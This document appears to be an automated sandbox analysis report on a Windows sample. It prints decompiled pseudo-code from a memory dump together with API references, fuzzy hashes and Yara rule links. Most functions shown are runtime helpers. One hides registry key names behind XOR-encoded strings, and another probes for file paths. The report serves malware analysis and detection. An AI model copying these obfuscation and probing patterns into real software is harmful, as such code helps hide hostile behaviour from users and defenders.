				_t17 = SetFilePointerEx(_a4, _a8, _t25,  &_v12); // executed
				__eflags = _t17;
				if(_t17 == 0) {
					goto L1;
				}
				_t21 = _v12;
				__eflags = _v8;
				if(__eflags >= 0) {
					if(__eflags > 0) {
						L6:
						_push(0);
						SetFilePointerEx(_a4, _v20, _v16, 0);
						_t19 = E00B55BBD();
						 *_t19 = 0x16;
						goto L7;
					}
					__eflags = _t21 - 0x7fffffff;
					if(_t21 > 0x7fffffff) {
						goto L6;
					}
				}
				return _t21;
			}

0x00b57229
0x00b57235
0x00b57247
0x00b57249
0x00b57250
0x00b572a5
0x00000000
0x00b572a5
0x00b57258
0x00b57262
0x00b57268
0x00b5726b
0x00b5726e
0x00b57274
0x00b57276
0x00000000
0x00000000
0x00b57278
0x00b5727b
0x00b5727e
0x00b57280
0x00b57289
0x00b57289
0x00b57294
0x00b5729a
0x00b5729f
0x00000000
0x00b5729f
0x00b57282
0x00b57287
0x00000000
0x00000000
0x00b57287
0x00b572ac

APIs

SetFilePointerEx.KERNEL32(?,00000000,00000000,?,00000001,?), ref: 00B5723F
GetLastError.KERNEL32(?,?,?), ref: 00B57249
__dosmaperr.LIBCMT ref: 00B57250
SetFilePointerEx.KERNELBASE(?,?,?,?,?), ref: 00B5726E
SetFilePointerEx.KERNEL32(?,?,?,00000000,00000000,?,?,?), ref: 00B57294

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer$ErrorLast__dosmaperr
String ID:
API String ID: 1114809156-0
Opcode ID: a23c372d24e344cc6a4087b12bdb3a97facb6223cafd40d01f0b777b1525d680
Instruction ID: 348589393fa062bb7bc497f0fcd3f45cf349e94b481bb7395f86a4da128a54ee
Opcode Fuzzy Hash: a23c372d24e344cc6a4087b12bdb3a97facb6223cafd40d01f0b777b1525d680
Instruction Fuzzy Hash: 70018E31945118BBCB109F95DC08EDE7FB9EF06722F0002C5F824921A0CF728984DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B4A87E, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107
registryCOMMON

Download Yara Rule

C-Code - Quality: 76%

			E00B4A87E(void* __ebx, void* __edi, void* __esi) {
				signed int _t38;
				long _t45;
				void* _t48;
				void _t49;
				void _t50;
				void* _t62;
				int* _t64;
				char _t66;
				signed int _t69;
				intOrPtr* _t77;
				void* _t78;
				signed int _t79;
				void* _t81;
				void* _t90;
				void* _t91;
				signed int _t93;
				void* _t95;

				_t93 = _t95 - 0xd0;
				_t38 =  *0xb69014; // 0x26ce9e99
				 *(_t93 + 0xcc) = _t38 ^ _t93;
				_push(__edi);
				 *(_t93 - 0x7c) = 1;
				 *(_t93 - 0x74) = 0;
				E00B4D0F0(__edi, _t93 - 0x34, 0, 0xff);
				asm("movaps xmm0, [0xb3dbd0]");
				asm("movups [ebp-0x70], xmm0");
				_t64 = 0;
				 *(_t93 - 0x78) = 0xff;
				asm("movaps xmm0, [0xb3dca0]");
				asm("movups [ebp-0x60], xmm0");
				 *((intOrPtr*)(_t93 - 0x50)) = 0xd071312;
				 *((intOrPtr*)(_t93 - 0x4c)) = 0x15033310;
				 *((intOrPtr*)(_t93 - 0x48)) = 0x505001b;
				 *((char*)(_t93 - 0x44)) = 0;
				do {
					_t11 = _t64 + 0x40; // 0x40
					 *(_t93 + _t64 - 0x70) =  *(_t93 + _t64 - 0x70) ^ _t11;
					_t64 = _t64 + 1;
				} while (_t64 < 0x2c);
				 *((char*)(_t93 - 0x44)) = 0;
				_t45 = RegOpenKeyExA(0x80000002, _t93 - 0x70, 0, 0x20019, _t93 - 0x74); // executed
				if(_t45 == 0) {
					 *((intOrPtr*)(_t93 - 0x40)) = 0x2f2b3402;
					 *((intOrPtr*)(_t93 - 0x3c)) = 0x25270920;
					 *((short*)(_t93 - 0x38)) = 0x310d;
					 *((char*)(_t93 - 0x36)) = 0;
					RegQueryValueExA( *(_t93 - 0x74), E00B4282B(_t93 - 0x40), 0, _t93 - 0x7c, _t93 - 0x34, _t93 - 0x78); // executed
				}
				_push(0x104);
				_t62 = E00B509A2();
				_t77 = _t93 - 0x34;
				_t90 = _t62 - _t77;
				do {
					_t66 =  *_t77;
					 *((char*)(_t77 + _t90)) = _t66;
					_t77 = _t77 + 1;
				} while (_t66 != 0);
				 *((intOrPtr*)(_t93 - 0x40)) = 0x757a391f;
				 *((intOrPtr*)(_t93 - 0x3c)) = 0x2e342409;
				 *((short*)(_t93 - 0x38)) = 0x29;
				_t48 = E00B42D10(_t93 - 0x40);
				_t78 = _t48;
				_t91 = _t48;
				do {
					_t49 =  *_t78;
					_t78 = _t78 + 1;
				} while (_t49 != 0);
				_t79 = _t78 - _t91;
				_t34 = _t62 - 1; // -1
				_t81 = _t34;
				do {
					_t50 =  *(_t81 + 1);
					_t81 = _t81 + 1;
				} while (_t50 != 0);
				_t69 = _t79 >> 2;
				memcpy(_t81, _t91, _t69 << 2);
				memcpy(_t91 + _t69 + _t69, _t91, _t79 & 0x00000003);
				return E00B4AE43( *(_t93 + 0xcc) ^ _t93);
			}

0x00b4a87f
0x00b4a88c
0x00b4a893
0x00b4a89b
0x00b4a8a1
0x00b4a8b0
0x00b4a8b3
0x00b4a8b8
0x00b4a8c2
0x00b4a8c6
0x00b4a8c8
0x00b4a8cb
0x00b4a8d2
0x00b4a8d6
0x00b4a8dd
0x00b4a8e4
0x00b4a8eb
0x00b4a8ee
0x00b4a8ee
0x00b4a8f1
0x00b4a8f5
0x00b4a8f6
0x00b4a8fe
0x00b4a911
0x00b4a919
0x00b4a91e
0x00b4a929
0x00b4a934
0x00b4a93f
0x00b4a94b
0x00b4a94b
0x00b4a951
0x00b4a95b
0x00b4a95d
0x00b4a965
0x00b4a967
0x00b4a967
0x00b4a969
0x00b4a96c
0x00b4a96d
0x00b4a974
0x00b4a97b
0x00b4a982
0x00b4a988
0x00b4a98d
0x00b4a98f
0x00b4a991
0x00b4a991
0x00b4a993
0x00b4a994
0x00b4a998
0x00b4a99a
0x00b4a99a
0x00b4a99d
0x00b4a99d
0x00b4a9a0
0x00b4a9a1
0x00b4a9a9
0x00b4a9ac
0x00b4a9b3
0x00b4a9cc

APIs

RegOpenKeyExA.KERNELBASE(80000002,?,00000000,00020019,?,00000000,?,00000000), ref: 00B4A911
RegQueryValueExA.KERNELBASE(?,00000000,00000000,?,?,?), ref: 00B4A94B

Strings

$4., xrefs: 00B4A97B

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: OpenQueryValue
String ID: $4.
API String ID: 4153817207-83132562
Opcode ID: a8b5799eeee6d1fff869213870b1b163d9dea9df9816078679d00cbc6661dc4b
Instruction ID: f524b3aa817b0ef596cd5cbfada8d9400b688f836806561829ac46d44d35a8bf
Opcode Fuzzy Hash: a8b5799eeee6d1fff869213870b1b163d9dea9df9816078679d00cbc6661dc4b
Instruction Fuzzy Hash: CB41B471D0425C9FDB25DFA9DC90AEEBBB8FF44304F20026DE845A7212EB705A49DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B5AA59, Relevance: 4.6, APIs: 3, Instructions: 69
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B5AA59(void* __ecx) {
				intOrPtr _v8;
				intOrPtr _t7;
				void* _t8;
				void* _t13;
				void* _t24;
				WCHAR* _t26;

				_t26 = GetEnvironmentStringsW();
				if(_t26 == 0) {
					L7:
					_t13 = 0;
				} else {
					_t17 = E00B5AA22(_t26) - _t26 >> 1;
					_t7 = E00B5A975(0, 0, _t26, E00B5AA22(_t26) - _t26 >> 1, 0, 0, 0, 0);
					_v8 = _t7;
					if(_t7 == 0) {
						goto L7;
					} else {
						_t8 = E00B56F1C(_t7); // executed
						_t24 = _t8;
						if(_t24 == 0 || E00B5A975(0, 0, _t26, _t17, _t24, _v8, 0, 0) == 0) {
							_t13 = 0;
						} else {
							_t13 = _t24;
							_t24 = 0;
						}
						E00B564B8(_t24);
					}
				}
				if(_t26 != 0) {
					FreeEnvironmentStringsW(_t26);
				}
				return _t13;
			}

0x00b5aa68
0x00b5aa6e
0x00b5aac9
0x00b5aac9
0x00b5aa70
0x00b5aa7e
0x00b5aa84
0x00b5aa8c
0x00b5aa91
0x00000000
0x00b5aa93
0x00b5aa94
0x00b5aa99
0x00b5aa9e
0x00b5aabe
0x00b5aab8
0x00b5aab8
0x00b5aaba
0x00b5aaba
0x00b5aac1
0x00b5aac6
0x00b5aa91
0x00b5aacd
0x00b5aad0
0x00b5aad0
0x00b5aade

APIs

GetEnvironmentStringsW.KERNEL32(00000000,?,00000002,?,?,00B6102D,00000000,00000001,?,?,00000000), ref: 00B5AA62
FreeEnvironmentStringsW.KERNEL32(00000000,?,?,00B6102D,00000000,00000001,?,?,00000000), ref: 00B5AAD0

Part of subcall function 00B5A975: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,?,00000000,00000000,00000000,?,00B592F5,?,00000000,00000000), ref: 00B5AA17

Part of subcall function 00B56F1C: RtlAllocateHeap.NTDLL(00000000,00000000,00000000,?,00B5084B,00000002,?,?,?,00B424A9,00000000,0000002C,00B425BB), ref: 00B56F4E

_free.LIBCMT ref: 00B5AAC1

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: EnvironmentStrings$AllocateByteCharFreeHeapMultiWide_free
String ID:
API String ID: 2560199156-0
Opcode ID: 47a624a90488db75607cfceb036e5a292ee6e0792d983eb2e0f1a8d866ea10ea
Instruction ID: f28da5049e718e04cc00ee7f393ace93bfa9e5f51babecb78fd7169353c3f955
Opcode Fuzzy Hash: 47a624a90488db75607cfceb036e5a292ee6e0792d983eb2e0f1a8d866ea10ea
Instruction Fuzzy Hash: 1101D462A016153F273155A61D89E7B6AEDCEC7B9235903E8FD04E3241EE658D09C1F2

Uniqueness

Uniqueness Score: -1.00%

Function 00B58BA1, Relevance: 4.6, APIs: 3, Instructions: 61
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00B58BA1(void* __eflags, signed int _a4) {
				intOrPtr _t13;
				int _t15;
				void* _t21;
				signed int _t33;
				long _t35;

				_t33 = _a4;
				if(E00B5B205(_t33) != 0xffffffff) {
					_t13 =  *0xb6a6c8; // 0x100fd38
					if(_t33 != 1 || ( *(_t13 + 0x98) & 0x00000001) == 0) {
						if(_t33 != 2 || ( *(_t13 + 0x60) & 0x00000001) == 0) {
							goto L7;
						} else {
							goto L6;
						}
					} else {
						L6:
						_t21 = E00B5B205(2);
						if(E00B5B205(1) == _t21) {
							goto L1;
						}
						L7:
						_t15 = FindCloseChangeNotification(E00B5B205(_t33)); // executed
						if(_t15 != 0) {
							goto L1;
						}
						_t35 = GetLastError();
						L9:
						E00B5B174(_t33);
						 *((char*)( *((intOrPtr*)(0xb6a6c8 + (_t33 >> 6) * 4)) + 0x28 + (_t33 & 0x0000003f) * 0x38)) = 0;
						if(_t35 == 0) {
							return 0;
						}
						return E00B55B87(_t35) | 0xffffffff;
					}
				}
				L1:
				_t35 = 0;
				goto L9;
			}

0x00b58ba8
0x00b58bb5
0x00b58bbb
0x00b58bc3
0x00b58bd1
0x00000000
0x00000000
0x00000000
0x00000000
0x00b58bd9
0x00b58bd9
0x00b58bdb
0x00b58bed
0x00000000
0x00000000
0x00b58bef
0x00b58bf7
0x00b58bff
0x00000000
0x00000000
0x00b58c07
0x00b58c09
0x00b58c0a
0x00b58c22
0x00b58c29
0x00000000
0x00b58c37
0x00000000
0x00b58c32
0x00b58bc3
0x00b58bb7
0x00b58bb7
0x00000000

APIs

FindCloseChangeNotification.KERNELBASE(00000000,00000000,?,?,00B58AD7,?,00B66260,0000000C,00B58B7F,?), ref: 00B58BF7
GetLastError.KERNEL32(?,00B58AD7,?,00B66260,0000000C,00B58B7F,?), ref: 00B58C01
__dosmaperr.LIBCMT ref: 00B58C2C

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 32f02c999e3a5711010a6f2b330c117dd9b203db9df4d6cec69440d2d8cf968a
Instruction ID: 666438eef93175f40b545349cb120b431389e4131f8b5748c2c742d9fa658d3c
Opcode Fuzzy Hash: 32f02c999e3a5711010a6f2b330c117dd9b203db9df4d6cec69440d2d8cf968a
Instruction Fuzzy Hash: 52012B326051245BDA211634A885F7D27DDCB82B37F2902DDFD15BB1E1EF678C8D4260

Uniqueness

Uniqueness Score: -1.00%

Function 00B571AB, Relevance: 4.6, APIs: 3, Instructions: 50
COMMON

Download Yara Rule

C-Code - Quality: 86%

			E00B571AB(void* __ecx, void* __eflags, signed int _a4, union _LARGE_INTEGER _a8, union _LARGE_INTEGER* _a12, intOrPtr _a16) {
				signed int _v8;
				void* _v12;
				void* _t15;
				int _t16;
				signed int _t19;
				signed int _t32;
				signed int _t33;
				signed int _t36;

				_t36 = _a4;
				_push(_t32);
				_t15 = E00B5B205(_t36);
				_t33 = _t32 | 0xffffffff;
				if(_t15 != _t33) {
					_push(_a16);
					_t16 = SetFilePointerEx(_t15, _a8, _a12,  &_v12); // executed
					if(_t16 != 0) {
						if((_v12 & _v8) == _t33) {
							goto L2;
						} else {
							_t19 = _v12;
							_t39 = (_t36 & 0x0000003f) * 0x38;
							 *( *((intOrPtr*)(0xb6a6c8 + (_t36 >> 6) * 4)) + _t39 + 0x28) =  *( *((intOrPtr*)(0xb6a6c8 + (_t36 >> 6) * 4)) + 0x28 + (_t36 & 0x0000003f) * 0x38) & 0x000000fd;
						}
					} else {
						E00B55B87(GetLastError());
						goto L2;
					}
				} else {
					 *((intOrPtr*)(E00B55BBD())) = 9;
					L2:
					_t19 = _t33;
				}
				return _t19;
			}

0x00b571b3
0x00b571b6
0x00b571b8
0x00b571bd
0x00b571c3
0x00b571d6
0x00b571e4
0x00b571ec
0x00b57207
0x00000000
0x00b57209
0x00b57209
0x00b57214
0x00b5721e
0x00b5721e
0x00b571ee
0x00b571f5
0x00000000
0x00b571fa
0x00b571c5
0x00b571ca
0x00b571d0
0x00b571d0
0x00b571d2
0x00b57228

APIs

SetFilePointerEx.KERNELBASE(00000000,?,?,00000000,00000002,?,00000000,?,?,?,00B572E9,00000000,?,?,00000002), ref: 00B571E4
GetLastError.KERNEL32(?,00B572E9,00000000,?,?,00000002,?,00B51304,?,00000000,00000000,00000001,?,?,?,00B513BA), ref: 00B571EE
__dosmaperr.LIBCMT ref: 00B571F5

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 4acc9260e732fd3cd2c5e0d025cf6a72a9b685d01a9a1414b847b9647b70cdee
Instruction ID: 7d1ac932b3254300415ea7d6f8ea590f57451a20f0bdb84603ab63e56c799dce
Opcode Fuzzy Hash: 4acc9260e732fd3cd2c5e0d025cf6a72a9b685d01a9a1414b847b9647b70cdee
Instruction Fuzzy Hash: 4C012D327145186FCB158F54EC45EAE3B69DB85332B2402C5FC11A7190EE71DD408BA0

Uniqueness

Uniqueness Score: -1.00%

Function 00B42D46, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E00B42D46(void* __ebx, void* __edi, void* __esi) {
				signed int _t20;
				intOrPtr* _t24;
				void _t27;
				void _t28;
				void* _t31;
				void _t32;
				void _t33;
				void* _t34;
				void* _t36;
				void _t37;
				void _t38;
				int _t41;
				intOrPtr* _t45;
				char _t49;
				signed int _t51;
				signed int _t57;
				signed int _t64;
				void* _t72;
				void* _t73;
				signed int _t74;
				void* _t75;
				signed int _t76;
				void* _t77;
				signed int _t78;
				void* _t80;
				void* _t85;
				void* _t90;
				void* _t97;
				void* _t98;
				void* _t99;
				char* _t102;
				signed int _t104;
				void* _t106;
				void* _t107;
				void* _t108;

				_t20 =  *0xb69014; // 0x26ce9e99
				 *(_t104 + 0xc) = _t20 ^ _t104;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_t45 = 0xb6ab00;
				E00B4A476(0xb6ab00, __edi, __esi, 0xb6ab00);
				_push(0x104);
				_t102 = E00B509A2();
				do {
					_t24 = E00B5187C( *_t45);
					_t72 = _t102 - _t24;
					do {
						_t49 =  *_t24;
						 *((char*)(_t72 + _t24)) = _t49;
						_t24 = _t24 + 1;
					} while (_t49 != 0);
					 *((char*)(_t104 + 0x11)) = _t49;
					 *((char*)(_t104 + 0x11)) = _t49;
					_t73 = _t104 + 0x10;
					 *(_t104 + 0x10) = 0x5c;
					_t97 = _t73;
					do {
						_t27 =  *_t73;
						_t73 = _t73 + 1;
					} while (_t27 != 0);
					_t74 = _t73 - _t97;
					_t7 = _t102 - 1; // -1
					_t80 = _t7;
					do {
						_t28 =  *(_t80 + 1);
						_t80 = _t80 + 1;
					} while (_t28 != 0);
					_t51 = _t74 >> 2;
					memcpy(_t80, _t97, _t51 << 2);
					_t54 = _t74 & 0x00000003;
					memcpy(_t97 + _t51 + _t51, _t97, _t74 & 0x00000003);
					_t106 = _t104 + 0x18;
					_t31 = E00B4A87E(_t45, _t97 + (_t74 & 0x00000003) + _t54, _t97);
					_t75 = _t31;
					_t98 = _t31;
					do {
						_t32 =  *_t75;
						_t75 = _t75 + 1;
					} while (_t32 != 0);
					_t76 = _t75 - _t98;
					_t10 = _t102 - 1; // -1
					_t85 = _t10;
					do {
						_t33 =  *(_t85 + 1);
						_t85 = _t85 + 1;
					} while (_t33 != 0);
					 *((intOrPtr*)(_t106 + 0x14)) = 0x2f2e256e;
					_t57 = _t76 >> 2;
					_t34 = memcpy(_t85, _t98, _t57 << 2);
					_t107 = _t106 + 0xc;
					 *(_t107 + 0x18) = _t34;
					memcpy(_t98 + _t57 + _t57, _t98, _t76 & 0x00000003);
					_t108 = _t107 + 0xc;
					_t15 = _t108 + 0x14; // 0x2f2e256e
					_t36 = E00B432BE(_t15);
					_t77 = _t36;
					_t99 = _t36;
					do {
						_t37 =  *_t77;
						_t77 = _t77 + 1;
					} while (_t37 != 0);
					_t78 = _t77 - _t99;
					_t16 = _t102 - 1; // -1
					_t90 = _t16;
					do {
						_t38 =  *(_t90 + 1);
						_t90 = _t90 + 1;
					} while (_t38 != 0);
					_t64 = _t78 >> 2;
					memcpy(_t90, _t99, _t64 << 2);
					memcpy(_t99 + _t64 + _t64, _t99, _t78 & 0x00000003);
					_t104 = _t108 + 0x18;
					_t41 = PathFileExistsA(_t102); // executed
					if(_t41 == 0) {
						goto L16;
					}
					L19:
					return E00B4AE43( *(_t104 + 0x1c) ^ _t104);
					L16:
					_t45 = _t45 + 4;
				} while (_t45 < 0xb6ab14);
				goto L19;
			}

0x00b42d49
0x00b42d50
0x00b42d54
0x00b42d56
0x00b42d57
0x00b42d58
0x00b42d5e
0x00b42d63
0x00b42d6e
0x00b42d70
0x00b42d72
0x00b42d7a
0x00b42d7c
0x00b42d7c
0x00b42d7e
0x00b42d81
0x00b42d82
0x00b42d88
0x00b42d8e
0x00b42d92
0x00b42d96
0x00b42d9a
0x00b42d9c
0x00b42d9c
0x00b42d9e
0x00b42d9f
0x00b42da3
0x00b42da5
0x00b42da5
0x00b42da8
0x00b42da8
0x00b42dab
0x00b42dac
0x00b42db2
0x00b42db5
0x00b42db9
0x00b42dbc
0x00b42dbc
0x00b42dbe
0x00b42dc3
0x00b42dc5
0x00b42dc7
0x00b42dc7
0x00b42dc9
0x00b42dca
0x00b42dce
0x00b42dd0
0x00b42dd0
0x00b42dd3
0x00b42dd3
0x00b42dd6
0x00b42dd7
0x00b42ddd
0x00b42de5
0x00b42de8
0x00b42de8
0x00b42dec
0x00b42df3
0x00b42df3
0x00b42df5
0x00b42df9
0x00b42dfe
0x00b42e00
0x00b42e02
0x00b42e02
0x00b42e04
0x00b42e05
0x00b42e09
0x00b42e0b
0x00b42e0b
0x00b42e0e
0x00b42e0e
0x00b42e11
0x00b42e12
0x00b42e18
0x00b42e1b
0x00b42e22
0x00b42e22
0x00b42e25
0x00b42e2d
0x00000000
0x00000000
0x00b42e42
0x00b42e54
0x00b42e2f
0x00b42e2f
0x00b42e32
0x00000000

APIs

PathFileExistsA.KERNELBASE(00000000), ref: 00B42E25

Strings

n%./, xrefs: 00B42DF5

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID: ExistsFilePath
String ID: n%./
API String ID: 1174141254-1693314898
Opcode ID: 98fc12a25bafa4c14a38774d4e881f4bd02ff4581160562f23c24e30b6951b97
Instruction ID: 259f117bf15c2ba9ce1c758bb0e0fab2b600c603449dc53bdcd629e24d21d660
Opcode Fuzzy Hash: 98fc12a25bafa4c14a38774d4e881f4bd02ff4581160562f23c24e30b6951b97
Instruction Fuzzy Hash: 9E315C516086420F5F19DF3C58212BFBBD2EFD634078445E8E8D297346DE215E0EE7A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B50A3F, Relevance: 1.6, APIs: 1, Instructions: 147
COMMON

Download Yara Rule

C-Code - Quality: 93%

			E00B50A3F(signed int __edx, intOrPtr* _a4) {
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t58;
				signed int _t59;
				signed char _t61;
				signed int _t63;
				signed char _t70;
				signed char _t73;
				signed int _t74;
				signed int _t75;
				intOrPtr _t76;
				void* _t77;
				intOrPtr _t78;
				signed int _t86;
				intOrPtr _t90;
				signed int _t91;
				signed int _t92;
				intOrPtr* _t93;
				signed char _t94;
				signed int _t95;
				signed int _t96;
				signed int _t98;
				signed int _t102;
				signed int _t106;
				signed int _t108;
				signed int _t111;
				intOrPtr* _t112;
				void* _t115;
				void* _t116;

				_t97 = __edx;
				if(_a4 != 0) {
					_t58 = E00B572EE(_a4);
					_t90 = _a4;
					_t106 = _t58;
					__eflags =  *(_t90 + 8);
					if( *(_t90 + 8) < 0) {
						 *(_t90 + 8) = 0;
					}
					_t59 = E00B572B8(_t106, 0, 0, 1); // executed
					_t91 = _t97;
					_t116 = _t115 + 0x10;
					_v12 = _t91;
					_t111 = _t59;
					_v24 = _t111;
					__eflags = _t91;
					if(__eflags > 0) {
						L7:
						_t61 =  *(_a4 + 0xc);
						__eflags = _t61 & 0x000000c0;
						if((_t61 & 0x000000c0) != 0) {
							_t63 = _t106 >> 6;
							_t92 = (_t106 & 0x0000003f) * 0x38;
							_v16 = _t63;
							_v20 = _t92;
							_t93 = _a4;
							_v8 =  *((intOrPtr*)(_t92 +  *((intOrPtr*)(0xb6a6c8 + _t63 * 4)) + 0x29));
							_t94 =  *(_t93 + 0xc);
							asm("cdq");
							_t108 =  *_t93 -  *((intOrPtr*)(_t93 + 4));
							_t86 = _t97;
							__eflags = _t94 & 0x00000003;
							if((_t94 & 0x00000003) == 0) {
								_t70 =  *(_a4 + 0xc) >> 2;
								__eflags = _t70 & 0x00000001;
								if((_t70 & 0x00000001) != 0) {
									L18:
									_t112 = _a4;
									L19:
									_t95 = _v24;
									_t98 = _v12;
									__eflags = _t95 | _t98;
									if((_t95 | _t98) != 0) {
										_t73 =  *(_t112 + 0xc);
										__eflags = _t73 & 0x00000001;
										if((_t73 & 0x00000001) == 0) {
											__eflags = _v8 - 1;
											if(_v8 == 1) {
												_t75 = E00B64ED0(_t108, _t86, 2, 0);
												_t95 = _v24;
												_t108 = _t75;
											}
											_t108 = _t108 + _t95;
											asm("adc edx, ebx");
											L26:
											_t74 = _t108;
											goto L27;
										}
										_t74 = E00B50BC8(_a4, _t95, _t98, _t108, _t86);
										goto L27;
									}
									goto L26;
								}
								_t59 = E00B55BBD();
								 *_t59 = 0x16;
								goto L17;
							}
							__eflags = _v8 - 1;
							_t96 = _v16;
							_t102 = _v20;
							if(_v8 != 1) {
								L13:
								_t76 =  *((intOrPtr*)(0xb6a6c8 + _t96 * 4));
								__eflags =  *((char*)(_t102 + _t76 + 0x28));
								if( *((char*)(_t102 + _t76 + 0x28)) >= 0) {
									goto L18;
								}
								_t112 = _a4;
								_t77 = E00B50F24( *((intOrPtr*)(_t112 + 4)),  *_t112, _v8);
								_t116 = _t116 + 0xc;
								_t108 = _t108 + _t77;
								asm("adc ebx, edx");
								goto L19;
							}
							_t78 =  *((intOrPtr*)(0xb6a6c8 + _t96 * 4));
							__eflags =  *(_t102 + _t78 + 0x2d) & 0x00000002;
							if(( *(_t102 + _t78 + 0x2d) & 0x00000002) == 0) {
								goto L13;
							}
							_t74 = E00B50D89(_t86, _t108, _t111, _a4, _t111, _v12);
							goto L27;
						}
						asm("cdq");
						_t74 = _t111 -  *((intOrPtr*)(_a4 + 8));
						asm("sbb ecx, edx");
						goto L27;
					} else {
						if(__eflags < 0) {
							L17:
							_t74 = _t59 | 0xffffffff;
							L27:
							return _t74;
						}
						__eflags = _t111;
						if(_t111 < 0) {
							goto L17;
						}
						goto L7;
					}
				}
				 *((intOrPtr*)(E00B55BBD())) = 0x16;
				return E00B528EC() | 0xffffffff;
			}

0x00b50a3f
0x00b50a4b
0x00b50a6c
0x00b50a72
0x00b50a77
0x00b50a79
0x00b50a7c
0x00b50a7e
0x00b50a7e
0x00b50a87
0x00b50a8c
0x00b50a8e
0x00b50a91
0x00b50a94
0x00b50a96
0x00b50a99
0x00b50a9b
0x00b50aab
0x00b50aae
0x00b50ab2
0x00b50ab4
0x00b50acf
0x00b50ad2
0x00b50ad5
0x00b50adf
0x00b50ae6
0x00b50ae9
0x00b50af1
0x00b50af4
0x00b50af5
0x00b50af7
0x00b50afa
0x00b50afd
0x00b50b5b
0x00b50b5e
0x00b50b60
0x00b50b74
0x00b50b74
0x00b50b77
0x00b50b77
0x00b50b7c
0x00b50b7f
0x00b50b81
0x00b50b87
0x00b50b8b
0x00b50b8d
0x00b50ba0
0x00b50ba4
0x00b50bac
0x00b50bb1
0x00b50bb9
0x00b50bb9
0x00b50bbb
0x00b50bbd
0x00b50bbf
0x00b50bbf
0x00000000
0x00b50bbf
0x00b50b96
0x00000000
0x00b50b9b
0x00000000
0x00b50b83
0x00b50b62
0x00b50b67
0x00000000
0x00b50b67
0x00b50aff
0x00b50b03
0x00b50b06
0x00b50b09
0x00b50b2d
0x00b50b2d
0x00b50b34
0x00b50b39
0x00000000
0x00000000
0x00b50b3b
0x00b50b46
0x00b50b4b
0x00b50b4e
0x00b50b50
0x00000000
0x00b50b50
0x00b50b0b
0x00b50b12
0x00b50b17
0x00000000
0x00000000
0x00b50b20
0x00000000
0x00b50b25
0x00b50abc
0x00b50abf
0x00b50ac1
0x00000000
0x00b50a9d
0x00b50a9d
0x00b50b6d
0x00b50b6d
0x00b50bc1
0x00000000
0x00b50bc3
0x00b50aa3
0x00b50aa5
0x00000000
0x00000000
0x00000000
0x00b50aa5
0x00b50a9b
0x00b50a52
0x00000000

Memory Dump Source

Source File: 00000019.00000002.379879733.0000000000B31000.00000020.00020000.sdmp, Offset: 00B30000, based on PE: true

Associated: 00000019.00000002.379859596.0000000000B30000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379958375.0000000000B67000.00000002.00020000.sdmp Download File
Associated: 00000019.00000002.379969920.0000000000B69000.00000004.00020000.sdmp Download File
Associated: 00000019.00000002.379986296.0000000000B6C000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2365dd5eacc65c3c6cdd9eae6a1093b3e97f57b8538579a9ab7d8113f9476d0b
